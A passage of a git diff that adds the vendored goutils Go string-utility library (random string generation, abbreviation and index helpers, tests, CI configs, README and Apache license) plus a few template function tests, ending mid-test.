+func TestNindent(t *testing.T) {
+ tpl := `{{nindent 4 "a\nb\nc"}}`
+ if err := runt(tpl, "\n a\n b\n c"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestReplace(t *testing.T) {
+ tpl := `{{"I Am Henry VIII" | replace " " "-"}}`
+ if err := runt(tpl, "I-Am-Henry-VIII"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestPlural(t *testing.T) {
+ tpl := `{{$num := len "two"}}{{$num}} {{$num | plural "1 char" "chars"}}`
+ if err := runt(tpl, "3 chars"); err != nil {
+ t.Error(err)
+ }
+ tpl = `{{len "t" | plural "cheese" "%d chars"}}`
+ if err := runt(tpl, "cheese"); err != nil {
+ t.Error(err)
+ }
+}
diff --git a/vendor/github.com/aokoli/goutils/.travis.yml b/vendor/github.com/aokoli/goutils/.travis.yml
new file mode 100644
index 0000000000..4025e01ec4
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/.travis.yml
@@ -0,0 +1,18 @@
+language: go
+
+go:
+ - 1.6
+ - 1.7
+ - 1.8
+ - tip
+
+script:
+ - go test -v
+
+notifications:
+ webhooks:
+ urls:
+ - https://webhooks.gitter.im/e/06e3328629952dabe3e0
+ on_success: change # options: [always|never|change] default: always
+ on_failure: always # options: [always|never|change] default: always
+ on_start: never # options: [always|never|change] default: always
diff --git a/vendor/github.com/aokoli/goutils/CHANGELOG.md b/vendor/github.com/aokoli/goutils/CHANGELOG.md
new file mode 100644
index 0000000000..d700ec47f2
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/CHANGELOG.md
@@ -0,0 +1,8 @@
+# 1.0.1 (2017-05-31)
+
+## Fixed
+- #21: Fix generation of alphanumeric strings (thanks @dbarranco)
+
+# 1.0.0 (2014-04-30)
+
+- Initial release.
diff --git a/vendor/github.com/aokoli/goutils/LICENSE.txt b/vendor/github.com/aokoli/goutils/LICENSE.txt
new file mode 100644
index 0000000000..d645695673
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/LICENSE.txt
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/vendor/github.com/aokoli/goutils/README.md b/vendor/github.com/aokoli/goutils/README.md
new file mode 100644
index 0000000000..163ffe72a8
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/README.md
@@ -0,0 +1,70 @@
+GoUtils
+===========
+[![Stability: Maintenance](https://masterminds.github.io/stability/maintenance.svg)](https://masterminds.github.io/stability/maintenance.html)
+[![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils) [![Build Status](https://travis-ci.org/Masterminds/goutils.svg?branch=master)](https://travis-ci.org/Masterminds/goutils) [![Build status](https://ci.appveyor.com/api/projects/status/sc2b1ew0m7f0aiju?svg=true)](https://ci.appveyor.com/project/mattfarina/goutils)
+
+
+GoUtils provides users with utility functions to manipulate strings in various ways. It is a Go implementation of some
+string manipulation libraries of Java Apache Commons. GoUtils includes the following Java Apache Commons classes:
+* WordUtils
+* RandomStringUtils
+* StringUtils (partial implementation)
+
+## Installation
+If you have Go set up on your system, run the following from the command line/terminal inside your GOPATH directory:
+
+ go get github.com/Masterminds/goutils
+
+If you do not have Go set up on your system, please follow the [Go installation directions from the documentation](http://golang.org/doc/install), and then follow the instructions above to install GoUtils.
+
+
+## Documentation
+GoUtils doc is available here: [![GoDoc](https://godoc.org/github.com/Masterminds/goutils?status.png)](https://godoc.org/github.com/Masterminds/goutils)
+
+
+## Usage
+The code snippets below show examples of how to use GoUtils. Some functions return errors while others do not. The first instance below, which does not return an error, is the `Initials` function (located within the `wordutils.go` file).
+
+ package main
+
+ import (
+ "fmt"
+ "github.com/Masterminds/goutils"
+ )
+
+ func main() {
+
+ // EXAMPLE 1: A goutils function which returns no errors
+ fmt.Println (goutils.Initials("John Doe Foo")) // Prints out "JDF"
+
+ }
+
+Some functions return errors, mainly due to illegal arguments being passed as parameters. The code example below illustrates how to deal with a function that returns an error. In this instance, the function is the `Random` function (located within the `randomstringutils.go` file).
+
+ package main
+
+ import (
+ "fmt"
+ "github.com/Masterminds/goutils"
+ )
+
+ func main() {
+
+ // EXAMPLE 2: A goutils function which returns an error
+ rand1, err1 := goutils.Random (-1, 0, 0, true, true)
+
+ if err1 != nil {
+ fmt.Println(err1) // Prints out error message because -1 was entered as the first parameter in goutils.Random(...)
+ } else {
+ fmt.Println(rand1)
+ }
+
+ }
+
+## License
+GoUtils is licensed under the Apache License, Version 2.0. Please check the LICENSE.txt file or visit http://www.apache.org/licenses/LICENSE-2.0 for a copy of the license.
+
+## Issue Reporting
+Make suggestions or report issues using the GitHub issue tracker: https://github.com/Masterminds/goutils/issues
+
+## Website
+* [GoUtils webpage](http://Masterminds.github.io/goutils/)
diff --git a/vendor/github.com/aokoli/goutils/appveyor.yml b/vendor/github.com/aokoli/goutils/appveyor.yml
new file mode 100644
index 0000000000..657564a847
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/appveyor.yml
@@ -0,0 +1,21 @@
+version: build-{build}.{branch}
+
+clone_folder: C:\gopath\src\github.com\Masterminds\goutils
+shallow_clone: true
+
+environment:
+ GOPATH: C:\gopath
+
+platform:
+ - x64
+
+build: off
+
+install:
+ - go version
+ - go env
+
+test_script:
+ - go test -v
+
+deploy: off
diff --git a/vendor/github.com/aokoli/goutils/randomstringutils.go b/vendor/github.com/aokoli/goutils/randomstringutils.go
new file mode 100644
index 0000000000..1364e0cafd
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/randomstringutils.go
@@ -0,0 +1,268 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package goutils
+
+import (
+ "fmt"
+ "math"
+ "math/rand"
+ "regexp"
+ "time"
+ "unicode"
+)
+
+// RANDOM provides the time-based seed used to generate random numbers
+var RANDOM = rand.New(rand.NewSource(time.Now().UnixNano()))
+
+/*
+RandomNonAlphaNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of all characters (ASCII/Unicode values between 0 and 2,147,483,647 (math.MaxInt32)).
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomNonAlphaNumeric(count int) (string, error) {
+ return RandomAlphaNumericCustom(count, false, false)
+}
+
+/*
+RandomAscii creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of characters whose ASCII value is between 32 and 126 (inclusive).
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAscii(count int) (string, error) {
+ return Random(count, 32, 127, false, false)
+}
+
+/*
+RandomNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of numeric characters.
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomNumeric(count int) (string, error) {
+ return Random(count, 0, 0, false, true)
+}
+
+/*
+RandomAlphabetic creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alphabetic characters.
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphabetic(count int) (string, error) {
+ return Random(count, 0, 0, true, false)
+}
+
+/*
+RandomAlphaNumeric creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters.
+
+Parameter:
+ count - the length of random string to create
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphaNumeric(count int) (string, error) {
+ RandomString, err := Random(count, 0, 0, true, true)
+ if err != nil {
+ return "", fmt.Errorf("Error: %s", err)
+ }
+ match, err := regexp.MatchString("([0-9]+)", RandomString)
+ if err != nil {
+ panic(err)
+ }
+
+ if !match {
+ //Get the position between 0 and the length of the string-1 to insert a random number
+ position := rand.Intn(count)
+ //Insert a random number between [0-9] in the position
+ RandomString = RandomString[:position] + string('0'+rand.Intn(10)) + RandomString[position+1:]
+ return RandomString, err
+ }
+ return RandomString, err
+
+}
+
+/*
+RandomAlphaNumericCustom creates a random string whose length is the number of characters specified.
+Characters will be chosen from the set of alpha-numeric characters as indicated by the arguments.
+
+Parameters:
+ count - the length of random string to create
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func RandomAlphaNumericCustom(count int, letters bool, numbers bool) (string, error) {
+ return Random(count, 0, 0, letters, numbers)
+}
+
+/*
+Random creates a random string based on a variety of options, using the default source of randomness.
+This method has exactly the same semantics as RandomSeed(int, int, int, bool, bool, []rune, *rand.Rand), but
+instead of using an externally supplied source of randomness, it uses the internal *rand.Rand instance.
+
+Parameters:
+ count - the length of random string to create
+ start - the position in set of chars (ASCII/Unicode int) to start at
+ end - the position in set of chars (ASCII/Unicode int) to end before
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+ chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars.
+
+Returns:
+ string - the random string
+ error - an error stemming from an invalid parameter within underlying function, RandomSeed(...)
+*/
+func Random(count int, start int, end int, letters bool, numbers bool, chars ...rune) (string, error) {
+ return RandomSeed(count, start, end, letters, numbers, chars, RANDOM)
+}
+
+/*
+RandomSeed creates a random string based on a variety of options, using a supplied source of randomness.
+If the parameters start and end are both 0, they are set to ' ' and 'z' respectively, so the ASCII printable characters will be used,
+unless letters and numbers are both false, in which case start and end are set to 0 and math.MaxInt32, respectively.
+If chars is not nil, characters stored in chars that are between start and end are chosen.
+This method accepts a user-supplied *rand.Rand instance to use as a source of randomness. By seeding a single *rand.Rand instance
+with a fixed seed and using it for each call, the same random sequence of strings can be generated repeatedly and predictably.
+
+Parameters:
+ count - the length of random string to create
+ start - the position in set of chars (ASCII/Unicode decimals) to start at
+ end - the position in set of chars (ASCII/Unicode decimals) to end before
+ letters - if true, generated string may include alphabetic characters
+ numbers - if true, generated string may include numeric characters
+ chars - the set of chars to choose randoms from. If nil, then it will use the set of all chars.
+ random - a source of randomness.
+
+Returns:
+ string - the random string
+ error - an error stemming from invalid parameters: if count < 0; or the provided chars array is empty; or end <= start; or end > len(chars)
+*/
+func RandomSeed(count int, start int, end int, letters bool, numbers bool, chars []rune, random *rand.Rand) (string, error) {
+
+ if count == 0 {
+ return "", nil
+ } else if count < 0 {
+ err := fmt.Errorf("randomstringutils illegal argument: Requested random string length %v is less than 0.", count) // equiv to err := errors.New("...")
+ return "", err
+ }
+ if chars != nil && len(chars) == 0 {
+ err := fmt.Errorf("randomstringutils illegal argument: The chars array must not be empty")
+ return "", err
+ }
+
+ if start == 0 && end == 0 {
+ if chars != nil {
+ end = len(chars)
+ } else {
+ if !letters && !numbers {
+ end = math.MaxInt32
+ } else {
+ end = 'z' + 1
+ start = ' '
+ }
+ }
+ } else {
+ if end <= start {
+ err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) must be greater than start (%v)", end, start)
+ return "", err
+ }
+
+ if chars != nil && end > len(chars) {
+ err := fmt.Errorf("randomstringutils illegal argument: Parameter end (%v) cannot be greater than len(chars) (%v)", end, len(chars))
+ return "", err
+ }
+ }
+
+ buffer := make([]rune, count)
+ gap := end - start
+
+ // high-surrogates range, (\uD800-\uDBFF) = 55296 - 56319
+ // low-surrogates range, (\uDC00-\uDFFF) = 56320 - 57343
+
+ for count != 0 {
+ count--
+ var ch rune
+ if chars == nil {
+ ch = rune(random.Intn(gap) + start)
+ } else {
+ ch = chars[random.Intn(gap)+start]
+ }
+
+ if letters && unicode.IsLetter(ch) || numbers && unicode.IsDigit(ch) || !letters && !numbers {
+ if ch >= 56320 && ch <= 57343 { // low surrogate range
+ if count == 0 {
+ count++
+ } else {
+ // Insert low surrogate
+ buffer[count] = ch
+ count--
+ // Insert high surrogate
+ buffer[count] = rune(55296 + random.Intn(128))
+ }
+ } else if ch >= 55296 && ch <= 56191 { // High surrogates range (Partial)
+ if count == 0 {
+ count++
+ } else {
+ // Insert low surrogate
+ buffer[count] = rune(56320 + random.Intn(128))
+ count--
+ // Insert high surrogate
+ buffer[count] = ch
+ }
+ } else if ch >= 56192 && ch <= 56319 {
+ // private high surrogate, skip it
+ count++
+ } else {
+ // not one of the surrogates*
+ buffer[count] = ch
+ }
+ } else {
+ count++
+ }
+ }
+ return string(buffer), nil
+}
diff --git a/vendor/github.com/aokoli/goutils/randomstringutils_test.go b/vendor/github.com/aokoli/goutils/randomstringutils_test.go
new file mode 100644
index 0000000000..b990654a1c
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/randomstringutils_test.go
@@ -0,0 +1,78 @@
+package goutils
+
+import (
+ "fmt"
+ "math/rand"
+ "testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestRandomSeed(t *testing.T) {
+
+ // count, start, end, letters, numbers := 5, 0, 0, true, true
+ random := rand.New(rand.NewSource(10))
+ out := "3ip9v"
+
+ // Test 1: Simulating RandomAlphaNumeric(count int)
+ if x, _ := RandomSeed(5, 0, 0, true, true, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, true, nil, random, x, out)
+ }
+
+ // Test 2: Simulating RandomAlphabetic(count int)
+ out = "MBrbj"
+
+ if x, _ := RandomSeed(5, 0, 0, true, false, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, true, false, nil, random, x, out)
+ }
+
+ // Test 3: Simulating RandomNumeric(count int)
+ out = "88935"
+
+ if x, _ := RandomSeed(5, 0, 0, false, true, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, true, nil, random, x, out)
+ }
+
+ // Test 4: Simulating RandomAscii(count int)
+ out = "H_I;E"
+
+ if x, _ := RandomSeed(5, 32, 127, false, false, nil, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 32, 127, false, false, nil, random, x, out)
+ }
+
+ // Test 5: Simulating RandomSeed(...) with custom chars
+ chars := []rune{'1', '2', '3', 'a', 'b', 'c'}
+ out = "2b2ca"
+
+ if x, _ := RandomSeed(5, 0, 0, false, false, chars, random); x != out {
+ t.Errorf("RandomSeed(%v, %v, %v, %v, %v, %v, %v) = %v, want %v", 5, 0, 0, false, false, chars, random, x, out)
+ }
+
+}
+
+// ****************************** EXAMPLES ********************************************
+
+func ExampleRandomSeed() {
+
+ var seed int64 = 10 // If you change this seed #, the random sequence below will change
+ random := rand.New(rand.NewSource(seed))
+ chars := []rune{'1', '2', '3', 'a', 'b', 'c'}
+
+ rand1, _ := RandomSeed(5, 0, 0, true, true, nil, random) // RandomAlphaNumeric (Alphabets and numbers possible)
+ rand2, _ := RandomSeed(5, 0, 0, true, false, nil, random) // RandomAlphabetic (Only alphabets)
+ rand3, _ := RandomSeed(5, 0, 0, false, true, nil, random) // RandomNumeric (Only numbers)
+ rand4, _ := RandomSeed(5, 32, 127, false, false, nil, random) // RandomAscii (Alphabets, numbers, and other ASCII chars)
+ rand5, _ := RandomSeed(5, 0, 0, true, true, chars, random) // RandomSeed with custom characters
+
+ fmt.Println(rand1)
+ fmt.Println(rand2)
+ fmt.Println(rand3)
+ fmt.Println(rand4)
+ fmt.Println(rand5)
+ // Output:
+ // 3ip9v
+ // MBrbj
+ // 88935
+ // H_I;E
+ // 2b2ca
+}
diff --git a/vendor/github.com/aokoli/goutils/stringutils.go b/vendor/github.com/aokoli/goutils/stringutils.go
new file mode 100644
index 0000000000..5037c4516b
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/stringutils.go
@@ -0,0 +1,224 @@
+/*
+Copyright 2014 Alexander Okoli
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package goutils
+
+import (
+ "bytes"
+ "fmt"
+ "strings"
+ "unicode"
+)
+
+// Typically returned by functions where a searched item cannot be found
+const INDEX_NOT_FOUND = -1
+
+/*
+Abbreviate abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "Now is the time for..."
+
+Specifically, the algorithm is as follows:
+
+ - If str is less than maxWidth characters long, return it.
+ - Else abbreviate it to (str[0:maxWidth - 3] + "...").
+ - If maxWidth is less than 4, return an illegal argument error.
+ - In no case will it return a string of length greater than maxWidth.
+
+Parameters:
+ str - the string to check
+ maxWidth - maximum length of result string, must be at least 4
+
+Returns:
+ string - abbreviated string
+ error - if the width is too small
+*/
+func Abbreviate(str string, maxWidth int) (string, error) {
+ return AbbreviateFull(str, 0, maxWidth)
+}
+
+/*
+AbbreviateFull abbreviates a string using ellipses. This will turn the string "Now is the time for all good men" into "...is the time for..."
+This function works like Abbreviate(string, int), but allows you to specify a "left edge" offset. Note that this left edge is not
+necessarily going to be the leftmost character in the result, or the first character following the ellipses, but it will appear
+somewhere in the result.
+In no case will it return a string of length greater than maxWidth.
+
+Parameters:
+ str - the string to check
+ offset - left edge of source string
+ maxWidth - maximum length of result string, must be at least 4
+
+Returns:
+ string - abbreviated string
+ error - if the width is too small
+*/
+func AbbreviateFull(str string, offset int, maxWidth int) (string, error) {
+ if str == "" {
+ return "", nil
+ }
+ if maxWidth < 4 {
+ err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width is 4")
+ return "", err
+ }
+ if len(str) <= maxWidth {
+ return str, nil
+ }
+ if offset > len(str) {
+ offset = len(str)
+ }
+ if len(str)-offset < (maxWidth - 3) { // 15 - 5 < 10 - 3 = 10 < 7
+ offset = len(str) - (maxWidth - 3)
+ }
+ abrevMarker := "..."
+ if offset <= 4 {
+ return str[0:maxWidth-3] + abrevMarker, nil // str.substring(0, maxWidth - 3) + abrevMarker;
+ }
+ if maxWidth < 7 {
+ err := fmt.Errorf("stringutils illegal argument: Minimum abbreviation width with offset is 7")
+ return "", err
+ }
+ if (offset + maxWidth - 3) < len(str) { // 5 + (10-3) < 15 = 12 < 15
+ abrevStr, _ := Abbreviate(str[offset:len(str)], (maxWidth - 3))
+ return abrevMarker + abrevStr, nil // abrevMarker + abbreviate(str.substring(offset), maxWidth - 3);
+ }
+ return abrevMarker + str[(len(str)-(maxWidth-3)):len(str)], nil // abrevMarker + str.substring(str.length() - (maxWidth - 3));
+}
+
+/*
+DeleteWhiteSpace deletes all whitespaces from a string as defined by unicode.IsSpace(rune).
+It returns the string without whitespaces.
+
+Parameter:
+ str - the string to delete whitespace from, may be nil
+
+Returns:
+ the string without whitespaces
+*/
+func DeleteWhiteSpace(str string) string {
+ if str == "" {
+ return str
+ }
+ sz := len(str)
+ var chs bytes.Buffer
+ count := 0
+ for i := 0; i < sz; i++ {
+ ch := rune(str[i])
+ if !unicode.IsSpace(ch) {
+ chs.WriteRune(ch)
+ count++
+ }
+ }
+ if count == sz {
+ return str
+ }
+ return chs.String()
+}
+
+/*
+IndexOfDifference compares two strings, and returns the index at which the strings begin to differ.
+
+Parameters:
+ str1 - the first string
+ str2 - the second string
+
+Returns:
+ the index where str1 and str2 begin to differ; -1 if they are equal
+*/
+func IndexOfDifference(str1 string, str2 string) int {
+ if str1 == str2 {
+ return INDEX_NOT_FOUND
+ }
+ if IsEmpty(str1) || IsEmpty(str2) {
+ return 0
+ }
+ var i int
+ for i = 0; i < len(str1) && i < len(str2); i++ {
+ if rune(str1[i]) != rune(str2[i]) {
+ break
+ }
+ }
+ if i < len(str2) || i < len(str1) {
+ return i
+ }
+ return INDEX_NOT_FOUND
+}
+
+/*
+IsBlank checks if a string is whitespace or empty (""). Observe the following behavior:
+
+ goutils.IsBlank("") = true
+ goutils.IsBlank(" ") = true
+ goutils.IsBlank("bob") = false
+ goutils.IsBlank(" bob ") = false
+
+Parameter:
+ str - the string to check
+
+Returns:
+ true - if the string is whitespace or empty ("")
+*/
+func IsBlank(str string) bool {
+ strLen := len(str)
+ if str == "" || strLen == 0 {
+ return true
+ }
+ for i := 0; i < strLen; i++ {
+ if !unicode.IsSpace(rune(str[i])) {
+ return false
+ }
+ }
+ return true
+}
+
+/*
+IndexOf returns the index of the first instance of sub in str, with the search beginning from the
+index start point specified. -1 is returned if sub is not present in str.
+
+An empty str or sub ("") will return -1 (INDEX_NOT_FOUND). A negative start position is treated as zero.
+A start position greater than the string length returns -1.
+
+Parameters:
+ str - the string to check
+ sub - the substring to find
+ start - the start position; negative treated as zero
+
+Returns:
+ the first index where the sub string was found (always >= start)
+*/
+func IndexOf(str string, sub string, start int) int {
+
+ if start < 0 {
+ start = 0
+ }
+
+ if len(str) < start {
+ return INDEX_NOT_FOUND
+ }
+
+ if IsEmpty(str) || IsEmpty(sub) {
+ return INDEX_NOT_FOUND
+ }
+
+ partialIndex := strings.Index(str[start:len(str)], sub)
+ if partialIndex == -1 {
+ return INDEX_NOT_FOUND
+ }
+ return partialIndex + start
+}
+
+// IsEmpty checks if a string is empty (""). Returns true if empty, and false otherwise.
+func IsEmpty(str string) bool {
+ return len(str) == 0
+}
diff --git a/vendor/github.com/aokoli/goutils/stringutils_test.go b/vendor/github.com/aokoli/goutils/stringutils_test.go
new file mode 100644
index 0000000000..dae93132a0
--- /dev/null
+++ b/vendor/github.com/aokoli/goutils/stringutils_test.go
@@ -0,0 +1,309 @@
+package goutils
+
+import (
+ "fmt"
+ "testing"
+)
+
+// ****************************** TESTS ********************************************
+
+func TestAbbreviate(t *testing.T) {
+
+ // Test 1
+ in := "abcdefg"
+ out := "abc..."
+ maxWidth := 6
